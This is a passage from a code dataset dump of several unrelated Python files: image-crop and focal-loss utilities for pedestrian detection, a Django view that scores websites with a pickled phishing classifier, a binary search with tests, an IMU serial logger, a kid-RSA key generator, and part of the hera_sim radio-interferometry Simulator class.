List[Annotation]:\n annotations = []\n root = et.parse(str(self.filepath)).getroot()\n for obj in root.iter('object'):\n bndbox = obj.find('bndbox')\n assert bndbox is not None\n annotation = Annotation(\n label=self._text(obj.find('name'), default=''),\n bbox=Rectangle(\n xmin=int(self._text(bndbox.find('xmin'), default='0')),\n ymin=int(self._text(bndbox.find('ymin'), default='0')),\n xmax=int(self._text(bndbox.find('xmax'), default='0')),\n ymax=int(self._text(bndbox.find('ymax'), default='0')),\n )\n )\n annotations.append(annotation)\n return annotations\n\n def _text(self, element: Optional[et.Element], default: str) -> str:\n if element is None:\n return default\n text = element.text\n if text is None:\n return default\n return text\n\n def __repr__(self) -> str:\n path = str(self.filepath)\n return f\"AnnotationFile('{path}')\"\n\n\ndef scale(src, x_factor, y_factor) -> Annotation:\n \"\"\"Масштабирование координат\"\"\"\n return Annotation(\n label = src.label,\n bbox = Rectangle(\n xmin = round(src.bbox.xmin * x_factor),\n xmax = round(src.bbox.xmax * x_factor),\n ymin = round(src.bbox.ymin * y_factor),\n ymax = round(src.bbox.ymax * y_factor)\n )\n )\n\n\ndef shift(src, x_shift, y_shift) -> Annotation:\n \"\"\"Сдвиг координат\"\"\"\n return Annotation(\n label = src.label,\n bbox = Rectangle(\n xmin = round(src.bbox.xmin - x_shift),\n xmax = round(src.bbox.xmax - x_shift),\n ymin = round(src.bbox.ymin - y_shift),\n ymax = round(src.bbox.ymax - y_shift)\n )\n )\n\n\ndef overlap_annotations(scaled_anns, left, top, right, bottom, CROP_SIZE=224) -> List:\n \"\"\"Пересечение аннотаций с кропом изображения\"\"\"\n crop_anns = []\n for ann in scaled_anns:\n if ann.bbox.xmin >= left and ann.bbox.ymin >= top:\n if ann.bbox.xmax <= right and ann.bbox.ymax <= bottom:\n crop_anns.append(shift(ann, left, top))\n else:\n if ann.bbox.xmax - right < ann.bbox.w/3 and ann.bbox.ymax - bottom < ann.bbox.h/3:\n crop_anns.append(Annotation(label=ann.label, bbox=Rectangle(\n xmin=ann.bbox.xmin-left, ymin=ann.bbox.ymin-top, \n xmax=min(CROP_SIZE, ann.bbox.xmax-left), ymax=min(CROP_SIZE, ann.bbox.ymax-top))))\n return crop_anns\n\n\ndef ann_to_numpy(ann):\n \"\"\"Convert coordinates according to tf bbox output: ymin, xmin, ymax, xmax, 1 - Pedestrian class \"\"\"\n bb = ann.bbox\n return np.array((bb.xmin, bb.ymin, bb.xmax, bb.ymax))\n\n\ndef get_feature_map(bboxes, crop_size, fm_size):\n y = np.zeros((fm_size, fm_size), dtype=np.uint8)\n\n box_size = crop_size / fm_size\n \n for bb in bboxes:\n\n bx = int(np.floor( ( (bb[0]+bb[2]-1)/2) / box_size))\n by = int(np.floor( ( (bb[1]+bb[3]-1)/2) / box_size))\n try:\n y[by, bx] = 1\n except IndexError:\n print(bboxes)\n print(nn_crop_size)\n\n return y\n\n\ndef crop_sample(idx, CROP_SIZE, FEATURE_MAP_SIZE, DATA_DIR):\n \"\"\"Crop image for WxH crops and resize every crop to CROP_SIZE \n return N crops with annotations\"\"\"\n N = 4\n W, H = 4, 3\n\n\n img_path = DATA_DIR + '/JPEGImages/' + f'{idx}.jpg'\n img = load_img(img_path)\n ann_path = DATA_DIR + '/Annotations/' + f'{idx}.xml'\n anns = AnnotationFileReader(ann_path).read_annotations()\n\n img_r = img.resize(size=(W*CROP_SIZE, H*CROP_SIZE))\n\n k_x = W*CROP_SIZE / img.width\n k_y = H*CROP_SIZE / img.height\n\n scaled_anns = [scale(a, k_x, k_y) for a in anns]\n out = []\n\n for w in range(W):\n for h in range(H):\n left = w * CROP_SIZE\n top = h * CROP_SIZE\n right = (w+1) * CROP_SIZE\n bottom = (h+1) * CROP_SIZE\n \n crop_img = img_r.crop((left, top, right, bottom))\n crop_anns = overlap_annotations(scaled_anns, left, top, right, bottom, CROP_SIZE)\n crop_bboxes = [ann_to_numpy(ann) for ann in crop_anns]\n\n y = get_feature_map(crop_bboxes, CROP_SIZE, FEATURE_MAP_SIZE)\n # print(y.sum())\n out.append(\n ((w,h),\n img_to_array(crop_img, dtype=np.uint8),\n y,\n crop_anns\n )\n )\n\n return sorted(out, key=lambda x: x[2].sum(), reverse=True)[:N]\n\n\n@tf.function\ndef focal_loss(\n y_true,\n y_pred,\n alpha = 0.25,\n gamma = 2.0,\n from_logits = False,\n) -> tf.Tensor:\n \"\"\"Implements the focal loss function.\n Focal loss was first introduced in the RetinaNet paper\n (https://arxiv.org/pdf/1708.02002.pdf). Focal loss is extremely useful for\n classification when you have highly imbalanced classes. It down-weights\n well-classified examples and focuses on hard examples. The loss value is\n much higher for a sample which is misclassified by the classifier as compared\n to the loss value corresponding to a well-classified example. One of the\n best use-cases of focal loss is its usage in object detection where the\n imbalance between the background class and other classes is extremely high.\n Args:\n y_true: true targets tensor.\n y_pred: predictions tensor.\n alpha: balancing factor.\n gamma: modulating factor.\n Returns:\n Weighted loss float `Tensor`. If `reduction` is `NONE`,this has the\n same shape as `y_true`; otherwise, it is scalar.\n \"\"\"\n if gamma and gamma < 0:\n raise ValueError(\"Value of gamma should be greater than or equal to zero.\")\n\n y_pred = tf.convert_to_tensor(y_pred)\n y_true = tf.cast(y_true, dtype=y_pred.dtype)\n\n # Get the cross_entropy for each entry\n ce = K.binary_crossentropy(y_true, y_pred, from_logits=from_logits)\n\n # If logits are provided then convert the predictions into probabilities\n if from_logits:\n pred_prob = tf.sigmoid(y_pred)\n else:\n pred_prob = y_pred\n\n p_t = (y_true * pred_prob) + ((1 - y_true) * (1 - pred_prob))\n alpha_factor = 1.0\n modulating_factor = 1.0\n\n if alpha:\n alpha = tf.cast(alpha, dtype=y_true.dtype)\n alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)\n\n if gamma:\n gamma = tf.cast(gamma, dtype=y_true.dtype)\n modulating_factor = tf.pow((1.0 - p_t), gamma)\n\n # compute the final loss and return\n return tf.reduce_sum(alpha_factor * modulating_factor * ce)\n\n\n","repo_name":"balezz/LacmusTflite","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9623795112","text":"from django.shortcuts import render, redirect\r\nimport pandas as pd\r\nimport pickle\r\n\r\ndef index_func(request):\r\n res = 0\r\n if request.method == 'POST':\r\n name = request.POST['name']\r\n NumDots = request.POST['NumDots']\r\n PathLevel = request.POST['PathLevel']\r\n NumDash = request.POST['NumDash']\r\n NumSensitiveWords= request.POST['NumSensitiveWords']\r\n PctExtHyperlinks = request.POST['PctExtHyperlinks']\r\n PctExtResourceUrls= request.POST['PctExtResourceUrls']\r\n InsecureForms = request.POST['InsecureForms']\r\n tooLong = request.POST['PctNullSelfRedirectHyperlinks']\r\n freq = request.POST['FrequentDomainNameMismatch']\r\n SubmitInfoToEmail = request.POST['SubmitInfoToEmail']\r\n IframeOrFrame = request.POST['IframeOrFrame']\r\n\r\n if name != \"\":\r\n df = pd.DataFrame(columns=['NumDots','PathLevel','NumDash','NumSensitiveWords',\r\n 'PctExtHyperlinks','PctExtResourceUrls','InsecureForms',\r\n 'PctNullSelfRedirectHyperlinks','FrequentDomainNameMismatch',\r\n 'SubmitInfoToEmail','IframeOrFrame'])\r\n\r\n df2 = {'NumDots': float(NumDots),'PathLevel': float(PathLevel),'NumDash': float(NumDash),\r\n 'NumSensitiveWords': float(NumSensitiveWords),'PctExtHyperlinks': float(PctExtHyperlinks)\r\n ,'PctExtResourceUrls': float(PctExtResourceUrls),'InsecureForms': float(InsecureForms),\r\n 'PctNullSelfRedirectHyperlinks': float(tooLong),'FrequentDomainNameMismatch':\r\n float(freq),'SubmitInfoToEmail': float(SubmitInfoToEmail),'IframeOrFrame': float(IframeOrFrame)}\r\n\r\n df = df.append(df2, ignore_index=True)\r\n # load the model from disk\r\n filename1 = 'polls/Phishing.pickle'\r\n loaded_model = pickle.load(open(filename1, 'rb'))\r\n res = loaded_model.predict(df)\r\n # print(res)\r\n if res[0] == 1:\r\n res = True\r\n else:\r\n res = False\r\n\r\n print(res)\r\n\r\n else:\r\n return redirect('homepage')\r\n else:\r\n pass\r\n\r\n return render(request, \"index.html\", {'response': res})","repo_name":"sadpasmgp/Solved_ML_projects","sub_path":"Phishing website Classification/mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"7980062545","text":"import unittest\nimport math\n\n\nclass MyTestCase(unittest.TestCase):\n def test_not_found(self):\n bsearch = Bsearch()\n index = bsearch.search([1, 3, 5, 10], 4)\n self.assertEqual(-1, index)\n\n def test_found(self):\n bsearch = Bsearch()\n index = bsearch.search([1, 3, 5, 8], 5)\n self.assertEqual(2, index)\n\n\nclass Bsearch:\n def search(self, array, elem):\n if len(array) == 0:\n return -1\n return self.sub_search(array, 0, len(array) - 1, elem)\n\n def sub_search(self, array, left, right, elem):\n if left == right - 1:\n if array[left] == elem:\n return left\n if array[right] == elem:\n return right\n return -1\n if left == right:\n if array[left] == elem:\n return left\n return -1\n pivot_index = math.floor((left + right) / 2)\n pivot = array[pivot_index]\n if pivot == elem:\n return pivot_index\n elif pivot > elem:\n return self.sub_search(array, left, pivot_index - 1, elem)\n else:\n return self.sub_search(array, pivot_index + 1, right, elem)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"IgorPerikov/py-solutions","sub_path":"alg/bsearch.py","file_name":"bsearch.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4202552127","text":"#! /usr/bin/env python3\n\n#Python imports\nimport argparse\nimport os\nimport sys\nimport time\n\n# Add Project root for imports\nFILE_PATH = sys.path[0]\nROOT_PATH = os.path.join(FILE_PATH, '..')\nsys.path.append(ROOT_PATH)\n\n# Project import\nfrom utils import create_simple_file, read_imu\n\n# 3rd party imports\nimport pandas as pd\nimport serial\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Log IMU data into simple \\\n file\")\n parser.add_argument(\"port\", type=str, help=\"device port for IMU \\\n connection\")\n parser.add_argument(\"logfile\", type=str, help=\"filepath of newly created \\\n logfile\")\n parser.add_argument(\"-a\", \"--action\", type=str, default='walking', \n help=\"Activity being recorded.\")\n parser.add_argument(\"-b\", \"--baudrate\", type=int, default=115200, \n help=\"baudrate of the connection\")\n parser.add_argument(\"-t\", \"--time_limit\", type=float, default=5.0, \n help=\"Length of logfile (in seconds)\")\n parser.add_argument(\"-s\", \"--sample_rate\", type=float, default=100.0, \n help=\"Sample rate of the IMU I2C interface\")\n\n args = parser.parse_args()\n #Log data\n frame = 1\n time_arr = []\n accx = []\n accy = []\n accz = []\n time_limit = args.time_limit - (1/args.sample_rate)\n input(\"Hit Enter to start logging\")\n\n ser = serial.Serial(args.port, args.baudrate)\n print(f\"Talking to {ser.name}\")\n start_time = time.time()\n time_diff = 0\n\n while(time_diff < time_limit):\n time_diff = time.time() - start_time\n time_arr.append(time_diff)\n ax, ay, az = read_imu(ser)\n accx.append(ax)\n accy.append(ay)\n accz.append(az)\n frame += 1\n\n ser.close()\n print(\"Done reading\")\n df = pd.DataFrame()\n df['Frames#'] = [i for i in range(1, frame)]\n df['Time'] = time_arr\n df['AccX'] = accx\n df['AccY'] = accy\n df['AccZ'] = accz\n\n create_simple_file(args.logfile, args.action, args.sample_rate, df)\n print(f\"File {args.logfile} is created\")","repo_name":"ryankshub/MotorArmProject","sub_path":"scripts/log_imu_data.py","file_name":"log_imu_data.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21705827989","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n'''\nkid RSA\nhttps://www.cs.uri.edu/cryptography/publickeykidkrypto.htm\n'''\n\nfrom kid_rsa import make_pair\nfrom sta_prompt import prompt_input, prompt_alert, has_console\n\ndef run_this():\n ''' run this at pythonista '''\n a = prompt_input('input a')\n b = prompt_input('input b')\n a1 = prompt_input('input a1')\n b1 = prompt_input('input b1')\n\n n, e, d, _ = make_pair(a, b, a1, b1)\n pub_msg = f'Your public key: (n, e): ({n}, {e})\\n'\n pri_msg = f'Your private key: (d): {d}'\n msg = pub_msg + pri_msg\n prompt_alert(msg)\n\nif __name__ == '__main__':\n if has_console():\n run_this()\n else:\n print('This script is designed to run in pythonista')\n","repo_name":"ericosur/ericosur-snippet","sub_path":"python3/kid_rsa/genkey_sta.py","file_name":"genkey_sta.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8422400760","text":"\"\"\"Module containing a high-level interface for :mod:`hera_sim`.\n\nThis module defines the :class:`Simulator` class, which provides the user\nwith a high-level interface to all of the features provided by :mod:`hera_sim`.\nFor detailed instructions on how to manage a simulation using the\n:class:`Simulator`, please refer to the tutorials.\n\"\"\"\n\nimport functools\nimport inspect\nimport numpy as np\nimport time\nimport warnings\nimport yaml\nfrom astropy import constants as const\nfrom cached_property import cached_property\nfrom collections.abc import Sequence\nfrom deprecation import deprecated\nfrom pathlib import Path\nfrom pyuvdata import UVData\nfrom typing import Optional, Union\n\nfrom . import __version__, io, utils\nfrom .components import SimulationComponent, get_model, list_all_components\nfrom .defaults import defaults\n\n_add_depr = deprecated(\n deprecated_in=\"1.0\", removed_in=\"2.0\", details=\"Use the :meth:`add` method instead.\"\n)\n\n# Define some commonly used types for typing purposes.\nAntPairPol = tuple[int, int, str]\nAntPair = tuple[int, int]\nAntPol = tuple[int, str]\nComponent = Union[str, type[SimulationComponent], SimulationComponent]\n\n\n# wrapper for the run_sim method, necessary for part of the CLI\ndef _generator_to_list(func, *args, **kwargs):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n result = list(func(*args, **kwargs))\n return None if result == [] else result\n\n return new_func\n\n\nclass Simulator:\n \"\"\"Simulate visibilities and/or instrumental effects for an entire array.\n\n Parameters\n ----------\n data\n :class:`pyuvdata.UVData` object to use for the simulation or path to a\n UVData-supported file.\n defaults_config\n Path to defaults configuraiton, seasonal keyword, or configuration\n dictionary for setting default simulation parameters. See tutorial\n on setting defaults for further information.\n redundancy_tol\n Position tolerance for finding redundant groups, in meters. Default is\n 1 meter.\n kwargs\n Parameters to use for initializing UVData object if none is provided.\n If ``data`` is a file path, then these parameters are used when reading\n the file. Otherwise, the parameters are used in creating a ``UVData``\n object using :func:`~.io.empty_uvdata`.\n\n Attributes\n ----------\n data : :class:`pyuvdata.UVData` instance\n Object containing simulated visibilities and metadata.\n extras : dict\n Dictionary to use for storing extra parameters.\n antpos : dict\n Dictionary pairing antenna numbers to ENU positions in meters.\n lsts : np.ndarray of float\n Observed LSTs in radians.\n freqs : np.ndarray of float\n Observed frequencies in GHz.\n times : np.ndarray of float\n Observed times in JD.\n pols : list of str\n Polarization strings.\n red_grps : list of list of int\n Redundant baseline groups. Each entry is a list containing the baseline\n integer for each member of that redundant group.\n red_vecs : list of :class:`numpy.ndarray` of float\n Average of all the baselines for each redundant group.\n red_lengths : list of float\n Length of each redundant baseline.\n \"\"\"\n\n def __init__(\n self,\n *,\n data: Optional[Union[str, UVData]] = None,\n defaults_config: Optional[Union[str, dict]] = None,\n redundancy_tol: float = 1.0,\n **kwargs,\n ):\n # TODO: add ability for user to specify parameter names to look for on\n # parsing call signature\n # Create some utility dictionaries.\n self._components = {}\n self._seeds = {}\n self._antpairpol_cache = {}\n self._filter_cache = {\n \"delay\": {},\n \"fringe\": {},\n }\n\n # apply and activate defaults if specified\n if defaults_config:\n self.apply_defaults(defaults_config)\n\n # actually initialize the UVData object stored in self.data\n self._initialize_data(data, **kwargs)\n self._calculate_reds(tol=redundancy_tol)\n self.extras = self.data.extra_keywords\n for param in (\"Ntimes\", \"Nfreqs\", \"Nblts\", \"Npols\", \"Nbls\"):\n setattr(self, param, getattr(self.data, param))\n self.Nants = len(self.antpos)\n\n # Let's make some helpful methods from the UVData object available\n for attr in (\"data\", \"flags\", \"antpairs\", \"antpairpols\", \"pols\"):\n setattr(\n self,\n f\"get_{attr}\",\n getattr(self.data, f\"get_{attr}\"),\n )\n\n @property\n def antenna_numbers(self):\n return self.data.antenna_numbers\n\n @property\n def ant_1_array(self):\n return self.data.ant_1_array\n\n @property\n def ant_2_array(self):\n return self.data.ant_2_array\n\n @property\n def polarization_array(self):\n return self.data.polarization_array\n\n @property\n def data_array(self):\n \"\"\"Array storing the visibilities.\"\"\"\n return self.data.data_array\n\n @property\n def antpos(self):\n \"\"\"Mapping between antenna numbers and ENU positions in meters.\"\"\"\n antpos, ants = self.data.get_ENU_antpos(pick_data_ants=True)\n return dict(zip(ants, antpos))\n\n @property\n def lsts(self):\n \"\"\"Observed Local Sidereal Times in radians.\"\"\"\n # This process retrieves the unique LSTs while respecting phase wraps.\n _, unique_inds = np.unique(self.data.time_array, return_index=True)\n return self.data.lst_array[unique_inds]\n\n @property\n def freqs(self):\n \"\"\"Frequencies in GHz.\"\"\"\n return np.unique(self.data.freq_array) / 1e9\n\n @property\n def times(self):\n \"\"\"Simulation times in JD.\"\"\"\n return np.unique(self.data.time_array)\n\n @property\n def pols(self):\n \"\"\"Array of polarization strings.\"\"\"\n return self.data.get_pols()\n\n @cached_property\n def integration_time(self):\n \"\"\"Integration time, assuming it's identical across baselines.\"\"\"\n return np.mean(self.data.integration_time)\n\n @cached_property\n def channel_width(self):\n \"\"\"Channel width, assuming each channel is the same width.\"\"\"\n return np.mean(self.data.channel_width)\n\n def apply_defaults(self, config: Optional[Union[str, dict]], refresh: bool = True):\n \"\"\"\n Apply the provided default configuration.\n\n Equivalent to calling :meth:`~hera_sim.defaults.set` with the same parameters.\n\n Parameters\n ----------\n config\n If given, either a path pointing to a defaults configuration\n file, a string identifier of a particular config (e.g. 'h1c')\n or a dictionary of configuration parameters\n (see :class:`~.defaults.Defaults`).\n refresh\n Whether to refresh the defaults.\n \"\"\"\n defaults.set(config, refresh=refresh)\n\n def calculate_filters(\n self,\n *,\n delay_filter_kwargs: Optional[dict[str, Union[float, str]]] = None,\n fringe_filter_kwargs: Optional[dict[str, Union[float, str, np.ndarray]]] = None,\n ):\n \"\"\"\n Pre-compute fringe-rate and delay filters for the entire array.\n\n Parameters\n ----------\n delay_filter_kwargs\n Extra parameters necessary for generating a delay filter. See\n :func:`utils.gen_delay_filter` for details.\n fringe_filter_kwargs\n Extra parameters necessary for generating a fringe filter. See\n :func:`utils.gen_fringe_filter` for details.\n \"\"\"\n delay_filter_kwargs = delay_filter_kwargs or {}\n fringe_filter_kwargs = fringe_filter_kwargs or {}\n self._calculate_delay_filters(**delay_filter_kwargs)\n self._calculate_fringe_filters(**fringe_filter_kwargs)\n\n def add(\n self,\n component: Component,\n *,\n add_vis: bool = True,\n ret_vis: bool = False,\n seed: Optional[Union[str, int]] = None,\n vis_filter: Optional[Sequence] = None,\n component_name: Optional[str] = None,\n **kwargs,\n ) -> Optional[Union[np.ndarray, dict[int, np.ndarray]]]:\n \"\"\"\n Simulate an effect then apply and/or return the result.\n\n Parameters\n ----------\n component\n Effect to be simulated. This can either be an alias of the effect,\n or the class (or instance thereof) that simulates the effect.\n add_vis\n Whether to apply the effect to the simulated data. Default is True.\n ret_vis\n Whether to return the simulated effect. Nothing is returned by default.\n seed\n How to seed the random number generator. Can either directly provide\n a seed as an integer, or use one of the supported keywords. See\n tutorial for using the :class:`Simulator` for supported seeding modes.\n Default is to use a seed based on the current random state.\n vis_filter\n Iterable specifying which antennas/polarizations for which the effect\n should be simulated. See tutorial for using the :class:`Simulator` for\n details of supported formats and functionality.\n component_name\n Name to use when recording the parameters used for simulating the effect.\n Default is to use the name of the class used to simulate the effect.\n **kwargs\n Optional keyword arguments for the provided ``component``.\n\n Returns\n -------\n effect\n The simulated effect; only returned if ``ret_vis`` is set to ``True``.\n If the simulated effect is multiplicative, then a dictionary mapping\n antenna numbers to the per-antenna effect (as a ``np.ndarray``) is\n returned. Otherwise, the effect for the entire array is returned with\n the same structure as the ``pyuvdata.UVData.data_array`` that the\n data is stored in.\n \"\"\"\n # Obtain a callable reference to the simulation component model.\n model = self._get_component(component)\n model_key = (\n component_name if component_name else self._get_model_name(component)\n )\n if not isinstance(model, SimulationComponent):\n model = model(**kwargs)\n self._sanity_check(model) # Check for component ordering issues.\n self._antpairpol_cache[model_key] = [] # Initialize this model's cache.\n if seed is None and add_vis:\n warnings.warn(\n \"You have not specified how to seed the random state. \"\n \"This effect might not be exactly recoverable.\",\n stacklevel=2,\n )\n\n # Simulate the effect by iterating over baselines and polarizations.\n data = self._iteratively_apply(\n model,\n add_vis=add_vis,\n ret_vis=ret_vis,\n vis_filter=vis_filter,\n antpairpol_cache=self._antpairpol_cache[model_key],\n seed=seed,\n **kwargs,\n ) # This is None if ret_vis is False\n\n if add_vis:\n # Record the component simulated and the parameters used.\n if defaults._override_defaults:\n for param in getattr(model, \"kwargs\", {}):\n if param not in kwargs and param in defaults():\n kwargs[param] = defaults(param)\n self._update_history(model, **kwargs)\n if seed:\n kwargs[\"seed\"] = seed\n self._update_seeds(model_key)\n if vis_filter is not None:\n kwargs[\"vis_filter\"] = vis_filter\n self._components[model_key] = kwargs\n self._components[model_key][\"alias\"] = component\n else:\n del self._antpairpol_cache[model_key]\n\n return data\n\n def get(\n self,\n component: Component,\n key: Optional[Union[int, str, AntPair, AntPairPol]] = None,\n ) -> Union[np.ndarray, dict[int, np.ndarray]]:\n \"\"\"\n Retrieve an effect that was previously simulated.\n\n Parameters\n ----------\n component\n Effect that is to be retrieved. See :meth:`add` for more details.\n key\n Key for retrieving simulated effect. Possible choices are as follows:\n An integer may specify either a single antenna (for per-antenna\n effects) or be a ``pyuvdata``-style baseline integer.\n A string specifying a polarization can be used to retrieve the\n effect for every baseline for the specified polarization.\n A length-2 tuple of integers can be used to retrieve the effect\n for that baseline for all polarizations.\n A length-3 tuple specifies a particular baseline and polarization\n for which to retrieve the effect.\n\n Not specifying a key results in the effect being returned for all\n baselines (or antennas, if the effect is per-antenna) and polarizations.\n\n Returns\n -------\n effect\n The simulated effect appropriate for the provided key. Return type\n depends on the effect being simulated and the provided key. See the\n tutorial Jupyter notebook for the :class:`Simulator` for example usage.\n\n Notes\n -----\n This will only produce the correct output if the simulated effect is\n independent of the data itself. If the simulated effect contains a\n randomly-generated component, then the random seed must have been set\n when the effect was initially simulated.\n \"\"\"\n # Retrieve the model and verify it has been simulated.\n if component in self._components:\n model = self._get_component(self._components[component][\"alias\"])\n model_key = component\n else:\n model = self._get_component(component)\n model_key = self._get_model_name(component)\n if model_key not in self._components:\n raise ValueError(\"The provided component has not yet been simulated.\")\n\n # Parse the key and verify that it's properly formatted.\n ant1, ant2, pol = self._parse_key(key)\n self._validate_get_request(model, ant1, ant2, pol)\n\n # Prepare to re-simulate the effect.\n kwargs = self._components[model_key].copy()\n kwargs.pop(\"alias\") # To handle multiple instances of simulating an effect.\n seed = kwargs.pop(\"seed\", None)\n vis_filter = kwargs.pop(\"vis_filter\", None)\n if not isinstance(model, SimulationComponent):\n model = model(**kwargs)\n\n if model.is_multiplicative:\n # We'll get a dictionary back, so the handling is different.\n gains = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n **kwargs,\n )\n if ant1 is not None:\n if pol:\n return gains[(ant1, pol)]\n return {key: gain for key, gain in gains.items() if ant1 in key}\n else:\n if pol:\n return {key: gain for key, gain in gains.items() if pol in key}\n return gains\n\n # Specifying neither antenna implies the full array's data is desired.\n if ant1 is None and ant2 is None:\n # Simulate the effect\n data = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n antpairpol_cache=None,\n **kwargs,\n )\n\n # Trim the data if a specific polarization is requested.\n if pol is None:\n return data\n pol_ind = self.pols.index(pol)\n return data[:, :, pol_ind]\n\n # We're only simulating for a particular baseline.\n # First, find out if it needs to be conjugated.\n try:\n blt_inds = self.data.antpair2ind(ant1, ant2)\n if blt_inds.size == 0:\n raise ValueError\n conj_data = False\n except ValueError:\n blt_inds = self.data.antpair2ind(ant2, ant1)\n conj_data = True\n\n # We've got three different seeding cases to work out.\n if seed == \"initial\":\n # Initial seeding means we need to do the whole array.\n data = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n antpairpol_cache=None,\n **kwargs,\n )[blt_inds, :, :]\n if conj_data: # pragma: no cover\n data = np.conj(data)\n if pol is None:\n return data\n pol_ind = self.data.get_pols().index(pol)\n return data[..., pol_ind]\n elif seed == \"redundant\":\n if conj_data:\n self._seed_rng(seed, model, ant2, ant1, pol)\n else:\n self._seed_rng(seed, model, ant1, ant2, pol)\n elif seed is not None:\n self._seed_rng(seed, model, ant1, ant2, pol)\n\n # Prepare the model parameters, then simulate and return the effect.\n if pol is None:\n data_shape = (self.lsts.size, self.freqs.size, len(self.pols))\n pols = self.pols\n return_slice = (slice(None),) * 3\n else:\n data_shape = (self.lsts.size, self.freqs.size, 1)\n pols = (pol,)\n return_slice = (slice(None), slice(None), 0)\n data = np.zeros(data_shape, dtype=complex)\n for i, _pol in enumerate(pols):\n args = self._initialize_args_from_model(model)\n args = self._update_args(args, model, ant1, ant2, pol)\n args.update(kwargs)\n if conj_data:\n self._seed_rng(seed, model, ant2, ant1, _pol)\n else:\n self._seed_rng(seed, model, ant1, ant2, _pol)\n data[..., i] = model(**args)\n if conj_data:\n data = np.conj(data)\n return data[return_slice]\n\n def plot_array(self):\n \"\"\"Generate a plot of the array layout in ENU coordinates.\"\"\"\n import matplotlib.pyplot as plt\n\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_xlabel(\"East Position [m]\", fontsize=12)\n ax.set_ylabel(\"North Position [m]\", fontsize=12)\n ax.set_title(\"Array Layout\", fontsize=12)\n dx = 0.25\n for ant, pos in self.antpos.items():\n ax.plot(pos[0], pos[1], color=\"k\", marker=\"o\")\n ax.text(pos[0] + dx, pos[1] + dx, ant)\n return fig\n\n def refresh(self):\n \"\"\"Refresh the object.\n\n This zeros the data array, resets the history, and clears the\n instance's ``_components`` dictionary.\n \"\"\"\n self.data.data_array = np.zeros(self.data.data_array.shape, dtype=complex)\n self.data.history = \"\"\n self._components.clear()\n self._antpairpol_cache.clear()\n self._seeds.clear()\n self._filter_cache = {\"delay\": {}, \"fringe\": {}}\n self.extras.clear()\n\n def write(self, filename, save_format=\"uvh5\", **kwargs):\n \"\"\"Write the ``data`` to disk using a ``pyuvdata``-supported filetype.\"\"\"\n try:\n getattr(self.data, f\"write_{save_format}\")(filename, **kwargs)\n except AttributeError:\n raise ValueError(\n \"The save_format must correspond to a write method in UVData.\"\n )\n\n # TODO: Determine if we want to provide the user the option to retrieve\n # simulation components as a return value from run_sim. Remove the\n # _generator_to_list wrapper if we do not make that a feature.\n @_generator_to_list\n def run_sim(self, sim_file=None, **sim_params):\n \"\"\"\n Run an entire simulation.\n\n Parameters\n ----------\n sim_file\n Path to a configuration file specifying simulation parameters.\n Required if ``sim_params`` is not provided.\n **sim_params\n Once-nested dictionary mapping simulation components to models,\n with each model mapping to a dictionary of parameter-value pairs.\n Required if ``sim_file`` is not provided.\n\n Returns\n -------\n components\n List of simulation components that were generated with the\n parameter ``ret_vis`` set to ``True``, returned in the order\n that they were simulated. This is only returned if there is\n at least one simulation component with ``ret_vis`` set to\n ``True`` in its configuration file/dictionary.\n\n Examples\n --------\n Suppose we have the following configuration dictionary::\n\n sim_params = {\n \"pntsrc_foreground\": {\"seed\": \"once\", \"nsrcs\": 500},\n \"gains\": {\"seed\": \"once\", \"dly_rng\": [-20, 20], \"ret_vis\": True},\n \"reflections\": {\"seed\": \"once\", \"dly_jitter\": 10},\n }\n\n Invoking this method with ``**sim_params`` as its argument will simulate\n visibilities appropriate for a sky with 500 point sources, generate\n bandpass gains for each antenna and apply the effect to the foreground\n data, then generate cable reflections with a Gaussian jitter in the\n reflection delays with a standard deviation of 10 ns and apply the\n effect to the data. The return value will be a list with one entry:\n a dictionary mapping antenna numbers to their associated bandpass gains.\n\n The same effect can be achieved by writing a YAML file that is loaded\n into a dictionary formatted as above. See the :class:`Simulator` tutorial\n for a more in-depth explanation of how to use this method.\n \"\"\"\n # make sure that only sim_file or sim_params are specified\n if not (bool(sim_file) ^ bool(sim_params)):\n raise ValueError(\n \"Either an absolute path to a simulation configuration \"\n \"file or a dictionary of simulation parameters may be \"\n \"passed, but not both. Please only pass one of the two.\"\n )\n\n # read the simulation file if provided\n if sim_file is not None:\n with open(sim_file) as config:\n try:\n sim_params = yaml.load(config.read(), Loader=yaml.FullLoader)\n except Exception:\n raise OSError(\"The configuration file was not able to be loaded.\")\n\n # loop over the entries in the configuration dictionary\n for component, params in sim_params.items():\n # make sure that the parameters are a dictionary\n if not isinstance(params, dict):\n raise TypeError(\n f\"The parameters for {component} are not formatted \"\n \"properly. Please ensure that the parameters for \"\n \"each component are specified using a dictionary.\"\n )\n\n # add the component to the data\n value = self.add(component, **params)\n\n # if the user wanted to return the data, then\n if value is not None:\n yield component, value\n\n def chunk_sim_and_save(\n self,\n save_dir,\n ref_files=None,\n Nint_per_file=None,\n prefix=None,\n sky_cmp=None,\n state=None,\n filetype=\"uvh5\",\n clobber=True,\n ):\n \"\"\"\n Chunk a simulation in time and write to disk.\n\n This function is a thin wrapper around :func:`~.io.chunk_sim_and_save`;\n please see that function's documentation for more information.\n \"\"\"\n io.chunk_sim_and_save(\n self.data,\n save_dir,\n 